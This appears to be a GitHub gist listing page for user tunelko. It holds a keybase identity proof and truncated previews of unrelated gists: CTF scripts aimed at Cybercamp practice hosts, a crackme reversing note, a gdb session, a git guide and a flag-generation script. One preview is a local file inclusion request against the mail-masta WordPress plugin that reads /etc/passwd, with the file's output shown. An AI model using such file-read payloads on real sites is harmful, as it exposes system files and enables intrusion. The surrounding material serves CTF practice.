I hereby claim:
- I am tunelko on github.
- I am tunelko (https://keybase.io/tunelko) on keybase.
- I have a public key whose fingerprint is A6A5 C4CE AE4F 79A0 0318 6B69 CF4D B1F3 89B4 55C5
To claim this, I am signing this object:
#!/usr/bin/env python | |
import requests | |
import urllib | |
import base64 | |
import string | |
import sys | |
url='https://webvulnerable07.cybercamp.es:8507/index.php' | |
alpha=string.uppercase+string.lowercase | |
digits=string.digits |
https://webvulnerable05.cybercamp.es:8505/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd | |
root:x:0:0:root:/root:/bin/ash | |
bin:x:1:1:bin:/bin:/sbin/nologin | |
daemon:x:2:2:daemon:/sbin:/sbin/nologin | |
adm:x:3:4:adm:/var/adm:/sbin/nologin | |
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin | |
sync:x:5:0:sync:/sbin:/bin/sync | |
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown | |
halt:x:7:0:halt:/sbin:/sbin/halt | |
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin |
<?php | |
/** | |
* @package EasySocial | |
* @copyright Copyright (C) 2010 - 2014 Stack Ideas Sdn Bhd. All rights reserved. | |
* @license GNU/GPL, see LICENSE.php | |
* EasySocial is free software. This version may have been modified pursuant | |
* to the GNU General Public License, and as distributed it includes or | |
* is derivative of works licensed under the GNU General Public License or | |
* other free or open source software licenses. | |
* See COPYRIGHT.php for copyright notices and details. |
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/env python | |
""" | |
mediumRE from | |
compare algorithm | |
for ( i = 0; strlen(input) > i && i <= 29; ++i ) | |
{ | |
if ( enc[i] == input[i] * fibo[i] + i ) | |
++cnt; | |
} |
Guia para git dummies Crear el repositorio. Generar la key ssh:
ssh-keygen -t rsa -C "correo@dominio.com"
Copiar ~/.ssh/id_rsa.pub a la configuración de la cuenta de GitHub. Probar SSH:
ssh -T git@github.com
#!/usr/bin/env python | |
import argparse | |
# from skeleton.users import models | |
# from sqlalchemy.exc import SQLAlchemyError | |
# from collections import Counter | |
import json | |
import sys | |
import requests | |
""" |
gdb-peda$ b *0x0000000000400824 | |
Breakpoint 1 at 0x400824 | |
gdb-peda$ disassemble main | |
=> 0x0000000000400824 <+212>: je 0x400855 <main+261> | |
gdb-peda$ run | |
RBX: 0x7fffffffe238 ("TH1S 1s s3cr3t!!") | |
.. | |
.. | |
Breakpoint 1, 0x0000000000400824 in main () |
#!/bin/bash | |
for flags in {1..45}; do echo "$flags: $(openssl rand -hex 16)" >> passwords && for lines in $(cut -f 2 -d ":" passwords); do echo "flag{$lines}" > /home/reto/flag_$flags.txt; done;done |